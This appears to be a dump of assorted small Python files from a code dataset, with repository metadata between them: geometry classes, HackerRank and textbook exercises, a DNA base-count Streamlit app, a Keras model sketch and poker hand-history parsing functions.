return ((self.x ** 2) + (self.y ** 2)) ** 0.5
def reflex_x(self):
""" Reflecting the point in the x-axis """
mx = self.x
my = self.y
return mx, -my
def slope_from_origin(self):
""" Returns the slop of the line joining the origin to the point """
return self.y / self.x
def straight_line_points(self, target):
""" Returns the values m and c from y = mx + c """
m = ((self.y - target.y) / (self.x - target.x))
c = self.y - m * self.x
return m, c
class Rectangle:
""" A classes to manufacture rectangle objects """
def __init__(self, posn, w, h):
""" Initialise the rectange at posn, with width w, height h """
self.corner = posn
self.width = w
self.height = h
def __str__(self):
return "({0}, {1}, {2})".format(self.corner, self.width, self.height)
def grow(self, delta_width, delta_height):
""" Grow (or shrink) this object by the deltas """
self.width += delta_width
self.height += delta_height
def move(self, dx, dy):
""" Move the point by dx and dy """
self.corner.x += dx
self.corner.y += dy
def area(self):
""" Return the area of the rectangle """
return self.height * self.width
def perimeter(self):
""" Return the length of the perimeter """
return self.width * 2 + self.height * 2
def flip(self):
""" Swap the width and height lengths """
x = self.height
y = self.width
self.height = y
self.width = x
def contains(self, point):
""" Test if a point falls with in the rectangle """
outer_x = self.corner.x + self.width
outer_y = self.corner.y + self.height
return (self.corner.x <= point.x < outer_x and
self.corner.y <= point.y < outer_y)
def collision(self, other):
""" Test if another rectangle collides with the first rectangle. """
outer_x = self.corner.x + self.width
outer_y = self.corner.y + self.height
if (self.corner.x <= other.corner.x <= outer_x and
self.corner.y <= other.corner.y <= outer_y):
return True
if (self.corner.x <= other.corner.x + other.width <= outer_x and
self.corner.y <= other.corner.y + other.height <= outer_y):
return True
if (self.corner.x <= other.corner.x <= outer_x and
self.corner.y <= other.corner.y + other.height <= outer_y):
return True
if (self.corner.x <= other.corner.x + other.width <= outer_x and
self.corner.y <= other.corner.y <= outer_y):
return True
return False
def test_suite():
r = Rectangle(Point(0, 0), 10, 5)
test(r.area() == 50)
test(r.perimeter() == 30)
test(r.width == 10 and r.height == 5)
#r.flip()
#test(r.width == 5 and r.height == 10)
test(r.contains(Point(0, 0)))
test(r.contains(Point(3, 3)))
test(not r.contains(Point(3, 7)))
test(not r.contains(Point(3, 5)))
test(r.contains(Point(3, 4.99999)))
test(not r.contains(Point(-3, -3)))
# Testing if collision with the point of the Other Rectangle
test(r.collision(Rectangle(Point(0, 0), 10, 5)))
test(r.collision(Rectangle(Point(5, 0), 10, 5)))
test(r.collision(Rectangle(Point(10, 5), 10, 5)))
test(r.collision(Rectangle(Point(9, 4), 10, 5)))
test(not r.collision(Rectangle(Point(20, 5), 10, 5)))
# Testing if collision with the top right corner of Other Rectangle
test(not r.collision(Rectangle(Point(-11, 5), 10, 5)))
test(r.collision(Rectangle(Point(0, 0), 10, 5)))
test(not r.collision(Rectangle(Point(0, -6), 10, 5)))
test(r.collision(Rectangle(Point(-9, -4), 10, 5)))
# Testing if collision with the top left corner of Other Rectangle
test(r.collision(Rectangle(Point(10, -5), 10, 5)))
test(not r.collision(Rectangle(Point(10, -6), 10, 5)))
# Testing if collision with the bottom right corner of Other Rectangle
test(r.collision(Rectangle(Point(-10, 5), 10, 5)))
test(not r.collision(Rectangle(Point(-11, 0), 10, 5)))
test_suite()
| true
|
ccffe5aea5a33a432328474f402ac7f099d2a3ef
|
Python
|
harshareddy794/assignments
|
/Hacker_rank/find_a_string.py
|
UTF-8
| 222
| 3.21875
| 3
|
[] |
no_license
|
import string
count=0
if __name__ == '__main__':
string=input()
sub_string=input()
for i in range(0,len(string)):
if(string[i:i+len(sub_string)]==sub_string):
count=count+1
print(count)
| true
|
b9f35430c84c521dbdef7ac101fd47ec75696645
|
Python
|
yxtay/how-to-think-like-a-computer-scientist
|
/Files/files_ex5_mystery.py
|
UTF-8
| 404
| 3.421875
| 3
|
[] |
no_license
|
import turtle
def draw(t, values):
if len(values) == 2:
t.goto(int(values[0]), int(values[1]))
elif values[0] == "UP":
t.up()
elif values[0] == "DOWN":
t.down()
alex = turtle.Turtle()
wn = turtle.Screen()
infile = open("mystery.txt")
line = infile.readline()
while line:
values = line.split()
draw(alex, values)
line = infile.readline()
infile.close()
alex.hideturtle()
wn.exitonclick()
| true
|
109972125ac49438051f08e14145b929917d493c
|
Python
|
depchen/arithmetic
|
/剑指/23.py
|
UTF-8
| 1,671
| 3.71875
| 4
|
[] |
no_license
|
# 题目描述
#二叉搜索树 若它的左子树不空,则左子树上所有结点的值均小于它的根结点的值;
# 若它的右子树不空,则右子树上所有结点的值均大于它的根结点的值;
# 它的左、右子树也分别为二叉排序树。
# 输入一个整数数组,判断该数组是不是某二叉搜索树的后序遍历的结果。
# 如果是则输出Yes,否则输出No。假设输入的数组的任意两个数字都互不相同。
# -*- coding:utf-8 -*-
class Solution:
def __init__(self):
self.flag=False
def VerifySquenceOfBST(self, sequence):
# write code here
if len(sequence) < 0:
return False
if self.flag and len(sequence) == 0:
return True
if not self.flag and len(sequence) == 0:
return False
if min(sequence)>sequence[-1] or max(sequence)<sequence[-1]:
return True
index=0
for i in range(len(sequence)-1):
if sequence[i] >=sequence[-1]:
break
index = i
for j in range(index+1,len(sequence)-1):
if sequence[j]<sequence[-1]:
return False
left=True
right=True
self.flag=True
if index>0:
a = sequence[:index+1]
left=self.VerifySquenceOfBST(sequence[:index+1])
if index<len(sequence)-1:
aa=sequence[index+1:len(sequence)-1]
right = self.VerifySquenceOfBST(sequence[index+1:len(sequence)-1])
return left&right
if __name__ == '__main__':
s=Solution()
a=[4,8,6,12,16,14,10]
aa=s.VerifySquenceOfBST(a)
print(aa)
| true
|
efabcf910a467838b3ec72e3f6ceb3d41f5f7103
|
Python
|
jadsonlucio/EA-iqoption
|
/robo/web_page.py
|
UTF-8
| 1,216
| 2.796875
| 3
|
[] |
no_license
|
import sys
from PyQt5.QtCore import QUrl
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton,QGridLayout,QLineEdit
from PyQt5.QtWebEngineWidgets import QWebEngineView
class widget_principal(QWidget):
def __init__(self):
QWidget.__init__(self)
self.resize(250, 150)
self.move(300, 300)
self.setWindowTitle('Simple')
self.iniciar_componentes()
self.show()
def iniciar_componentes(self):
self.grid=QGridLayout()
self.text=QLineEdit()
self.web_widget=QWebEngineView()
self.botao_confirm=QPushButton(text="Carregar")
self.grid.addWidget(self.text,0,0)
self.grid.addWidget(self.botao_confirm, 0, 1)
self.grid.addWidget(self.web_widget,1,0)
self.botao_confirm.clicked.connect(self.carregar_url)
self.setGeometry(300, 300, 250, 150)
self.setWindowTitle('Absolute')
self.setLayout(self.grid)
def carregar_url(self):
url=self.text.text()
print(url)
self.web_widget.showFullScreen()
self.web_widget.load(QUrl(url))
if __name__ == '__main__':
app = QApplication(sys.argv)
widget=widget_principal()
app.exec_()
pass
| true
|
7002601cae82ca4b3cff90e71ab419f4d956af56
|
Python
|
JeeVeeVee/univ
|
/1steBachelor/Scriptingtalen/Examenvoorbereiding/Diana/DianaCryptoSystem.py
|
UTF-8
| 1,083
| 3.25
| 3
|
[] |
no_license
|
class Diana:
def __init__(self, bestand):
self.pad = ""
file = open(bestand, "r")
alfabet = "AZERTYUIOPQSDFGHJKJKKLMWXCVNB"
for line in file:
for char in line:
if char in alfabet:
self.pad += char
def index(self, string):
searchstring = ""
for char in string:
if char in "ABCDEFGHIJKMNOPQRSTUVWXYZ":
searchstring += char
assert self.pad.find(searchstring) >= 0, "ongeldige prefix"
return self.pad.find(searchstring) + len(searchstring)
def trigraph(self, a, b):
a = a.upper()
b = b.upper()
alfabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
waardeA = alfabet.find(a)
waardeB = alfabet.find(b)
return alfabet[(25 - waardeA - waardeB) % 26]
def codeer(self, woord, n = 10):
onePad = ""
i = 0
while woord[i] in "ABCDEFGHIJKLMNOPQRSTUVWXYZ ":
onePad += woord[i]
input = woord[len(onePad)]
diana = Diana('otp.txt')
print(diana.index('ABCDE FGHIJ'))
| true
|
f9bac025c77cd703ac47ea286e4f816feb1eafc1
|
Python
|
xlincw0w/Language-identifier-
|
/script.py
|
UTF-8
| 2,016
| 3.40625
| 3
|
[] |
no_license
|
from itertools import islice
import numpy as np
import string
lang = {}
def take(n, iterable):
return list(islice(iterable, n))
def getList(dict):
list = []
for key in dict.keys():
list.append(key)
return list
def get_trigrams_freqs(text):
len(text)
freqs = {}
first = [char.lower() for char in text if char not in (string.punctuation + ' ')]
first = ''.join(first)
for i in range(0, len(first) - 2):
key = first[i:i+3]
freqs[key] = 0
for tri in freqs:
occurence = 0
for j in range(0, len(first) - 2):
key = first[j:j+3]
if (tri == key):
occurence += 1
freq = float(occurence / ( len(first)/3 ) )
freqs[tri] = freq
freqs = {k: v for k, v in sorted(freqs.items(), key=lambda item: item[1], reverse=True)}
return take(15, freqs.items())
eng = "This May 26th Quantum League will be available on Steam! Do you like a good fight and healthy competition? Try out this 2v2 arena, king of the hill, three clone time rewind mechanic, barrels, and all type of game. Put your skills and tactics into overdrive and wishlist for Early Access now!"
fr = """Vous recherchez une histoire en français. Que ce soit pour un nouveau né ou de jeunes enfants, le moment de la lecture est souvent un moment privilégié entre parents et enfants. Quel plaisir pour une petite fille ou un petit garçon quand son papa ou sa maman lui lit une histoire.
Lire une histoire à un enfant avant de dormir contribue à un endormissement serein. Celà lui permet de s’évader dans un monde fabuleux ou a contrario d’aborder des sujets qui l’ont touché durant sa journée. Lui raconter une histoire chaque soir, c’est aussi prendre du temps pour son enfant. Ca peut être une nouvelle histoire ou une histoire qu’il connait déjà et qu’il aime beaucoup."""
lang['English'] = get_trigrams_freqs(eng)
lang['Francais'] = get_trigrams_freqs(fr)
print(lang['Francais'])
| true
|
a682a2db66c1390cfe4d5b5533a54378c1300ba8
|
Python
|
Crypto-Dimo/workbook_ex
|
/chapter_three/ex_80.py
|
UTF-8
| 313
| 4.0625
| 4
|
[] |
no_license
|
n = int(input('Enter a number that is >= 2: '))
factor = 2
active = True
if n < 2:
active = False
print('Invalid value.')
else:
print(f'The prime factors of {n} are:')
while factor <= n and active:
if n % factor == 0:
print(factor)
n = n // factor
else:
factor += 1
| true
|
ff69cf11f9c26fdd1fdfa5105de8b9145f35abba
|
Python
|
Eronite/pygamedemo
|
/niveau.py
|
UTF-8
| 3,516
| 3.1875
| 3
|
[] |
no_license
|
"""Classes du jeu de Labyrinthe Donkey Kong"""
import pygame
from pygame.locals import *
from constantes import *
from math import *
from affichage import *
class Niveau:
"""Classe permettant de créer un niveau"""
def __init__(self, fichier,fond):
self.fichier = fichier
self.structure = 0
self.fond = fond
def generer(self):
"""Méthode permettant de générer le niveau en fonction du fichier.
On crée une liste générale, contenant une liste par ligne à afficher"""
#On ouvre le fichier
with open(self.fichier, "r") as fichier:
structure_niveau = []
#On parcourt les lignes du fichier
for ligne in fichier:
ligne_niveau = []
#On parcourt les sprites (lettres) contenus dans le fichier
for sprite in ligne:
#On ignore les "\n" de fin de ligne
if sprite != '\n':
#On ajoute le sprite à la liste de la ligne
ligne_niveau.append(sprite)
#On ajoute la ligne à la liste du niveau
structure_niveau.append(ligne_niveau)
#On sauvegarde cette structure
self.structure = structure_niveau
def afficher(self, fenetre):
"""Méthode permettant d'afficher le niveau en fonction
de la liste de structure renvoyée par generer()"""
#Chargement des images (seule celle d'arrivée contient de la transparence)
mur = pygame.image.load(image_mur).convert()
depart = pygame.image.load(image_depart).convert()
arrivee = pygame.image.load(image_arrivee).convert_alpha()
#On parcourt la liste du niveau
num_ligne = 0
for ligne in self.structure:
#On parcourt les listes de lignes
num_case = 0
img_toblit = ''
for sprite in ligne:
if sprite == ';':
#On calcule la position réelle en pixels
x = num_case * taille_sprite
y = num_ligne * taille_sprite
if img_toblit == 'm': #m = Mur
fenetre.blit(mur, (x,y))
elif img_toblit == 'd': #d = Départ
fenetre.blit(depart, (x,y))
elif img_toblit == 'a': #a = Arrivée
fenetre.blit(arrivee, (x,y))
else:
img = pygame.image.load("images/"+img_toblit+".png")
fenetre.blit(img, (x,y))
img_toblit = ''
num_case += 1
else:
img_toblit = img_toblit + sprite
num_ligne += 1
def Rafraichir(self, fenetre, listejoueur, joueur):
Barre_de_vie(fenetre,joueur)
#Affichages aux nouvelles positions
fenetre.blit(self.fond, (0,0))
self.afficher(fenetre)
for joueur in listejoueur:
fenetre.blit(joueur.direction, (joueur.x, joueur.y)) #joueur.direction = l'image dans la bonne direction
pygame.display.flip()
def collision(self, abscisse, ordonne, joueur, listejoueur):
casex = floor(abscisse / taille_sprite) *taille_sprite
casey = floor(ordonne / taille_sprite) * taille_sprite
for cible in listejoueur:
if (casex == cible.x and casey == cible.y) and (joueur != listejoueur ):
cible.combat(joueur.attaque)
def evenemnt( self, joueur, event,listejoueur):
if event.type == KEYDOWN:
#Si l'utilisateur presse Echap ici, on revient seulement au menu
if event.key == K_ESCAPE:
continuer_jeu = 0
#Touches de déplacement
elif event.key == K_RIGHT:
joueur.deplacer('droite')
elif event.key == K_LEFT:
joueur.deplacer('gauche')
elif event.key == K_UP:
joueur.deplacer('haut')
elif event.key == K_DOWN:
joueur.deplacer('bas')
elif event.type == MOUSEBUTTONDOWN:
if event.button == 1:
#self.collision(event.pos[0],event.pos[1], joueur, listejoueur)
joueur.deposer(event.pos[0],event.pos[1] )
| true
|
0f79a5987184195177291aa8edf3ddb966eb89f8
|
Python
|
Zibsun/lesson1
|
/hello.py
|
UTF-8
| 33
| 2.75
| 3
|
[] |
no_license
|
name = "Асхат"
print (name)
| true
|
488fda17eb34fb04d475978138d05c94fbfe294f
|
Python
|
zqy0/spider
|
/spider_fun1.py
|
UTF-8
| 1,643
| 2.71875
| 3
|
[] |
no_license
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-04-03 15:03:09
# @Author : Your Name (you@example.org)
# @Link : http://example.org
# @Version : $Id$
from bs4 import BeautifulSoup
html = open('test1.html', 'r', encoding='utf-8')
def html_to_csv(html = html):
soup = BeautifulSoup(html, "lxml")
fangjian = soup.find(id='fangjian')
options = fangjian.find_all('option')
# 获取当前选中的校区和楼名和楼层
current_selected = soup.find_all('option',attrs={'selected':'selected'})
# drxiaoqu,drlouming,drlouceng
with open('I:\python\spider\dict_sheet\dict_1.csv', 'w', encoding='utf-8') as f:
f.write('xiaoqu_id,xiaoqu_info,louming_id,louming_info,louceng_id,louceng_info\n')
info_list = []
for i in current_selected[:3]:
value = i['value']
f.write(value+','+i.text.strip()+',')
info_list.append(value)
info_list.append(i.text.strip())
print(info_list)
with open('I:\python\spider\dict_sheet\dict.csv', 'w', encoding='utf-8') as f:
f.write('xiaoqu_id,xiaoqu_info,louming_id,louming_info,louceng_id,louceng_info,fangjian_value,fangjian_info\n')
for option in options:
value = option['value']
if value != '':
print(value + ',' + option.text.strip())
f.write(info_list[0]+','+info_list[1]+','+info_list[2]+','+info_list[3]+','+info_list[4]+','+
info_list[5]+','+value+','+option.text.strip()+'\n')
else:
print('---' + option.text.strip())
if __name__ == '__main__':
html_to_csv()
| true
|
fd047568dc16dbd8131fe4808a1e2e20fd0a7196
|
Python
|
MacHu-GWU/Dev-Exp-Share
|
/docs/source/02-SDE/01-Program-Language/02-Python-Root/10-Manipulate-PDF-in-Python/pikepdf/test.py
|
UTF-8
| 399
| 2.609375
| 3
|
[
"MIT"
] |
permissive
|
# -*- coding: utf-8 -*-
from pathlib import Path
from pikepdf import Pdf, PdfImage
dir_here = Path(__file__).absolute().parent
path_w2_pdf = dir_here.parent / "w2.pdf"
pdf = Pdf.open(f"{path_w2_pdf}")
for page_num, page in enumerate(pdf.pages, start=1):
# split page
dst = Pdf.new()
dst.pages.append(page)
path_dst = dir_here / f"page-{page_num}.pdf"
dst.save(f"{path_dst}")
| true
|
989a1cf8e8192ddc0a650197c089aa5543b9550a
|
Python
|
ssehuun/langStudy
|
/baekjoon/11654.py
|
UTF-8
| 87
| 2.71875
| 3
|
[] |
no_license
|
# https://www.acmicpc.net/problem/11654
# 아스키 코드
a = input()
print(ord(a))
| true
|
a72e0f000a7aeb985531d6a52d0622b4bdc0ce2a
|
Python
|
graysoncroom/PythonGraphingPlayground
|
/histogram.py
|
UTF-8
| 325
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/python
import matplotlib.pyplot as plt
population_ages = [22, 55, 62, 45, 34, 77, 4, 8, 14, 80, 65, 54, 43, 48, 24, 18, 13, 67]
min_age = 0
max_age = 140
age_step_by = 20
bins = [x for x in range(0, 141, 20)]
plt.hist(population_ages, bins, histtype='bar', rwidth=0.8)
plt.xlabel('x')
plt.ylabel('y')
plt.show()
| true
|
1243cb2b933a375c46b182f71f77947cf9ce6355
|
Python
|
azeembootwala/DesignPatterns-Deep-learning
|
/Chapter 1 Neural Networks/multi_label_model_branching.py
|
UTF-8
| 808
| 3.046875
| 3
|
[] |
no_license
|
import numpy as np
from tensorflow.keras import Model, Input
from tensorflow.keras.layers import Dense
def model_branch():
# An example of how a model structure looks for a branched NN
input_shape = (3,)
inputs = Input(input_shape)
x = Dense(10, activation = 'relu')(inputs)
x = Dense(10, activation = 'relu')(x)
output1 = Dense(5, activation = 'softmax')(x)
output2 = Dense(2, activation = 'softmax')(x)
model = Model(inputs, [output1 , output2])
model.compile(loss = 'categorical_crossentropy' , optimizer = 'adam', metrics = ['accuracy'])
model.summary()
return model
def model_multi_label():
# An example of a model structure for multi-label classification
pass
def train():
model = model_branch()
if __name__ == '__main__':
train()
| true
|
3534cdbb5793414a88cbe20367836b8fa8198303
|
Python
|
krikui/Test_repo
|
/test.py
|
UTF-8
| 233
| 3.265625
| 3
|
[] |
no_license
|
#!/usr/bin/python
import sys
print('Number of arguments:', len(sys.argv), 'arguments')
type(sys.argv)
print(str(sys.argv))
print("Help\n")
raw_input("\n\nPress the enter key to exit.")
x = 'foo'; sys.stdout.write(x+'\n')
sys.exit(0)
| true
|
283ee6e0e1e6c4294f0080a98310693db0a813d5
|
Python
|
tzuhwan/dna-count
|
/myapp.py
|
UTF-8
| 2,067
| 3.5625
| 4
|
[] |
no_license
|
#############################
# Import libaries
#############################
import pandas as pd
import streamlit as st
import altair as alt
#############################
# Page Title
#############################
st.write("""
# DNA Nucleotide Count Web App
This app counts the nucleotide composition of query DNA
***
""")
#############################
# Input Text Box
#############################
st.header("Enter DNA sequence")
st.write(
"DNA sequences consist of four bases: adenine(A), guanine(G), cytosine(C), and thymine(T). So just generate a DNA sequence using those 4 letters, or use this [DNA Sequence Generator](http://www.faculty.ucr.edu/~mmaduro/random.htm)."
)
sequence_input = ">DNA Query\nGGGGGGGAACGCTGAAGATCTCTTCTTCTCATGACTGAACTCGCGAGGGTCGTGATGTCGGTTCCTTCAAAGGTTAAAGAACAAAGGCTTACTGTGCGCA"
sequence = st.text_area("Sequence input", sequence_input, height=250)
sequence = sequence.splitlines()
sequence = sequence[1:] # exclude the sequence name
sequence = "".join(sequence) # concatenate dna sequence all together
st.write("""
***
""")
st.header("INPUT (DNA Query)")
sequence
# DNA nucleotide count
def DNA_nucleotide_count(seq):
d = {
"A": seq.count('A'),
"T": seq.count('T'),
"C": seq.count('C'),
"G": seq.count('G')
}
return d
X = DNA_nucleotide_count(sequence)
X_label = list(X)
X_values = list(X.values())
nucleotide_dict = {
"A": "Adenine(A)",
"C": "Cytosine(C)",
"G": "Guanine(G)",
"T": "Thymine(T)"
}
# Display base counts in a df
df = pd.DataFrame.from_dict(X, orient='index')
df = df.rename({0: 'count'}, axis='columns')
df.reset_index(inplace=True)
df = df.rename(columns={"index": "nucleotide"})
# df["nucleotide"] = df.apply(lambda x: (nucleotide_dict[x["nucleotide"]]))
df = df.replace({"nucleotide": nucleotide_dict})
st.subheader("Bases Count")
st.dataframe(df)
# Display bar chart using Altair
st.subheader("Chart Display")
p = alt.Chart(df).mark_bar().encode(x="nucleotide", y="count")
p = p.properties(width=alt.Step(80))
st.write(p)
| true
|
abf1b636e3aee9ea123f69a4a1ff5c9f637b2280
|
Python
|
SamAndrew27/poker-capstone
|
/src/datacleaning/columns_from_hand_history.py
|
UTF-8
| 22,939
| 3.328125
| 3
|
[] |
no_license
|
import pandas as pd
def fill_HH_columns(df):
"""takes in dataframe and uses HandHistory column to create the below features
Args:
df (DataFrame): Dataframe created using SQL DriveHud backup
Returns:
DataFrame: same as dataframe input with additional columns
"""
df['buyin'] = df['HandHistory'].apply(lambda hh: buyin(hh))
df['cash_or_tourn'] = df['HandHistory'].apply(lambda hh: gametype(hh)) # to discern between cash & tournaments
df['my_blind_anti_total'] = df['HandHistory'].apply(lambda hh: my_blind_anti_total(hh)) # how much I put in as default (blind(/anti))
df['my_cards'] = df['HandHistory'].apply(lambda hh: hole_cards(hh)) # my cards
df['starting_stack'] = df['HandHistory'].apply(lambda hh: start_stack(hh))
df['tournament_type'] = df['HandHistory'].apply(lambda hh: tournament_type(hh))
df['won'] = df['HandHistory'].apply(lambda hh: won(hh))
df['bet'] = df['HandHistory'].apply(lambda hh: bet(hh))
df['total_players'] = df['HandHistory'].apply(lambda hh: total_players(hh))
df['position'] = df['HandHistory'].apply(lambda hh: position(hh))
df['table_max_players'] = df['HandHistory'].apply(lambda hh: table_max(hh))
# pretty sure this requires edits for edge case, refer to function below
df['bets_before_my_preflop_action'] = df.HandHistory.apply(lambda hh: bets_before_my_preflop_action(hh))
df['action_type'] = df['HandHistory'].apply(lambda hh: action_type(hh))
df['player_names'] = df['HandHistory'].apply(lambda hh: player_names(hh)) # for use by other functions
df['players_acting_before_me'] = df['HandHistory'].apply(lambda hh: players_before(hh)) # does not include players who folded
df['players_acting_after_me'] = df['HandHistory'].apply(lambda hh: players_after(hh)) # this might not account for cases where action was folded leading to some players never making an action. If we end up using data for hands where some players did not have to act we will have to develop a more robust function
df['limpers'] = df['HandHistory'].apply(lambda hh: limpers(hh))
df['raises&reraises'] = df['HandHistory'].apply(lambda hh: raises_and_reraises(hh))
df['callers'] = df['HandHistory'].apply(lambda hh: callers(hh))
return df
##############################################################################################
# functions that do these processes
def buyin(hh):
"""gets buy-in of the tournament, fairly certain cash games still have some sort of value here?
Args:
hh: 'HandHistory' column, string data of hands
Returns:
float: buy-in of tournament
"""
for elem in hh:
if 'totalbuyin' in elem:
temp = elem
temp = temp.replace('<totalbuyin>$', '')
temp = temp.replace('</totalbuyin>', '')
return float(temp)
def gametype(hh):
"""gets gametype of tournament - used to get 'cash_or_tourn', which may be a misleading name
Args:
hh: 'HandHistory' column, list string data of hand
Returns:
string: type of game
"""
temp = None
for elem in hh:
if 'gametype' in elem:
temp = elem.replace('<gametype>', '').replace('</gametype>', '').strip()
break
return temp
def hole_cards(hh):
"""finds the cards I hold, saves the 2 values in their present form to a list
Args:
hh: 'HandHistory' column, string data of hands
Returns:
list: 2 cards I held, Suit:Face Value format
"""
c1 = ''
c2 = ''
for elem in hh:
if 'Pocket' in elem and 'Hero' in elem: # looks for string where my cards are listed
temp = elem.split(' ') # split and iterate through that string
for s in temp:
if 'Hero' in s: # gets card 1
c1 = s.replace('player="Hero">', '')
c1 = c1.replace('0', '')
if '</cards>' in s: # gets card 2
c2 = s.replace('</cards>', '')
c2 = c2.replace('0', '')
if c1 != '':
cards = [c1, c2] # puts cards if list if they exist
return cards
else:
return None
def start_stack(hh):
"""Finds amount of chips I started hand with
Args:
hh: 'HandHistory' column, string data of hands
Returns:
float: number of chips
"""
result = None
temp = ''
for elem in hh:
if 'Hero' in elem and 'addon' in elem:
temp = elem
if temp != '':
temp = temp.split(' ')
for elem in temp:
if 'chips' in elem:
result = elem.replace('chips="', '')
result = result.replace('"', '')
result = float(result)
return result
def tournament_type(hh):
"""gets type of tournament
Args:
hh:'HandHistory' column, string data of hands
Returns:
string: tournament type
"""
result = ''
cut = 0
counter = 0
for elem in hh:
if '<tournamentname>' in elem: # doing some string wrangling below to get just the name of the tournament
temp = elem
cut = temp.count('(')
temp = temp.replace('<tournamentname>', '')
for char in temp:
if char != '(':
result += char
else:
counter += 1
if counter == cut:
break
else:
result += char
result = result.rstrip()
result = result.replace('amp;', '')
if 'Table3' in result:
result = 'Jackpot Sit & Go $0.50'
return result
def won(hh):
"""How much I won in the hand
Args:
hh:'HandHistory' column, string data of hands
Returns:
float: amount won
"""
won = ''
temp = ''
result = 0
for elem in hh:
if 'Hero' in elem and 'addon' in elem:
temp = elem
if temp != '':
temp = temp.split(' ')
for elem in temp:
if 'win' in elem:
won = elem.replace('win="', '')
won = won.replace('"', '')
result = float(won)
return result
def bet(hh):
"""finds amount I bet in the hand
Args:
hh: 'HandHistory' column, string data of hands
Returns:
float: amount bet
"""
bet = ''
temp = ''
result = None
for elem in hh:
if 'Hero' in elem and 'addon' in elem:
temp = elem
if temp != '':
temp = temp.split(' ')
for elem in temp:
if 'bet' in elem:
bet = elem.replace('bet="', '').replace('"', '')
result = float(bet)
return result
def total_players(hh):
"""finds number of total players at table
Args:
hh: 'HandHistory' column, string data of hands
Returns:
int: total number of players (2-9 should be possible values)
"""
count = 0
for elem in hh:
if 'Pocket' in elem:
count += 1
return count
def position(hh):
"""Finds where I was seated
Args:
hh: 'HandHistory' column, string data of hands
Returns:
float: My position where 1 is the earliest seat and the total number of players would be equal to the last seat
(e.g. if there are three players, and I am sitting in the earliest position, return = 1/3 or 0.33)
"""
pos_lst = []
dealer_pos = 0
dealer_exists = False
hero_counter = 0
hero_found = False
result = None
hero_pos = 0
SB = ''
for elem in hh: # find all initial seatings
if 'dealer' in elem:
pos_lst.append(elem)
for idx, elem in enumerate(pos_lst):
if 'dealer="1"' in elem:
dealer_pos = idx
dealer_exists = True
break
if dealer_exists == False:
for elem in hh:
if 'type="1"' in elem and '[cards]' in elem:# finds SB
for sub_string in elem.split(): # iterates through SB to find player name
if 'player=' in sub_string:
SB = sub_string.replace('player="', '').replace('"','')
break
for idx, elem in enumerate(pos_lst): # iterate through pos_lst to get SB position
if SB in elem:
SB_idx = idx
break
if SB_idx == 0:
dealer_pos = len(pos_lst) - 1 # if SB is the 1st in list
else:
dealer_pos = SB_idx - 1 # otherwise just backstep 1
if dealer_pos != len(pos_lst) - 1: # if dealer isn't in last position
beginning = pos_lst[dealer_pos + 1 : ] # subset so lists are sequential
rest = pos_lst[ : dealer_pos + 1]
for elem in beginning: # first part of list
if 'name="Hero"' in elem: # in the case of hero being found
hero_counter += 1
hero_pos = hero_counter
hero_found = True
break
else:
hero_counter += 1
if hero_found == False: # if hero not found in first iteration
for elem in rest:
if 'name="Hero"' in elem:
hero_counter += 1
hero_pos = hero_counter
hero_found = True
break
else:
hero_counter += 1
else:
for elem in pos_lst: # in the event the dealer is in last position
if 'name="Hero"' in elem:
hero_counter += 1
hero_pos = hero_counter
hero_found = True
break
else:
hero_counter += 1
if hero_found:
result = hero_pos / len(pos_lst) # divides position by total number of players
return result
def table_max(hh):
"""max number of seats at the table, always greater or equal to number of players at table
Args:
hh:'HandHistory' column, string data of hands
Returns:
int: max players
"""
result = None
for elem in hh:
if 'maxplayers' in elem:
result = int(elem.replace('<maxplayers>', '').replace('</maxplayers>',''))
break
return result
def my_blind_anti_total(hh):
"""Finds how much I put in in blinds/anti
Args:
hh:'HandHistory' column, string data of hands
Returns:
float: amount blinded or antied
"""
action_list = []
result = 0
for elem in hh:
if '[cards]' in elem and 'Hero' in elem:
action_list.append(elem)
for elem in action_list:
for sub_string in elem.split():
if 'sum' in sub_string:
result += float(sub_string.replace('sum="', '').replace('"', '').strip())
return result
def bets_before_my_preflop_action(hh):
"""Finds amount bet prior to my preflop action (total sum of)
Args:
hh:'HandHistory' column, string data of hands
Returns:
float: amount opponents bet before my action
"""
start = 0
stop = 0
total=0
subset = []
for idx, elem in enumerate(hh): # find beginning/end of preflop action
if 'Pocket' in elem:
start = idx
if '<round no="2">' in elem: # WILL probably have to change this for instances when there was no round2
stop = idx
break
if stop != 0:
subset = hh[start+1:stop-1]
for idx, elem in enumerate(subset): # iterates through subset to find my first action
if 'Hero' in elem:
subset = subset[:idx]
break
for elem in subset:
for elem in elem.split():
if 'sum' in elem:
total += float(elem.replace('sum="', '').replace('"',''))
return total
def action_type(hh):
"""types of actions a player made preflop,
Args:
hh:'HandHistory' column, string data of hands
Returns:
dictionary: dictionary with the actions all players took in hand according to types as determined by DriveHud
"""
result = {}
start = 0
stop = 0
player = None
action_type = None
for idx, elem in enumerate(hh): # finds start of preflop action
if 'Pocket' in elem:
start = idx
subset = hh[start+1:]
for idx, elem in enumerate(subset):# finds end of preflop action
if '</round>' in elem:
stop = idx
break
subset = subset[:stop]
for elem in subset: # iterating through preflop action to find player/type
for sub_elem in elem.split():
if 'player' in sub_elem:
player = sub_elem.replace('player="', '').replace('"', '')
if 'type' in sub_elem:
action_type = int(sub_elem.replace('type="', '').replace('"', ''))
if player in result: # checks to see if player has already taken an action
break
else:
result[player] = action_type
return result
def player_names(hh):
"""gets names of all the players in hand
Args:
hh:'HandHistory' column, string data of hands
Returns:
list: all of the players in hand as string values
"""
player = None
result = []
for elem in hh:
if 'dealer' in elem:
for sub_elem in elem.split(): # finds lines where player names are specified
if 'name' in sub_elem:
player = sub_elem.replace('name="', '').replace('"', '')
result.append(player)
break
return result
def players_before(hh):
""" finds all players having entered hand before my action (acted but didn't fold)
Args:
hh:'HandHistory' column, string data of hands
Returns:
list: string values of all players having entered hand before my first action
"""
start = 0
stop = 0
players_before = [] # list of players before
for idx, elem in enumerate(hh): # list of players after
if 'Pocket' in elem:
start = idx
subset = hh[start+1:] # subset containing preflop action until end
for idx, elem in enumerate(subset):
if '</round>' in elem:
stop = idx
break
subset = subset[:stop] # subset containing just preflop action
for elem in subset:
action_type = 0
if 'Hero' in elem: # break if we find hero
break
else:
for sub_elem in elem.split():
if 'player' in sub_elem:
player_name = sub_elem.replace('player="', '').replace('"', '')
if 'type' in sub_elem:
action_type = int(sub_elem.replace('type="', '').replace('"', ''))
if action_type!= 0:
players_before.append(player_name)
return players_before
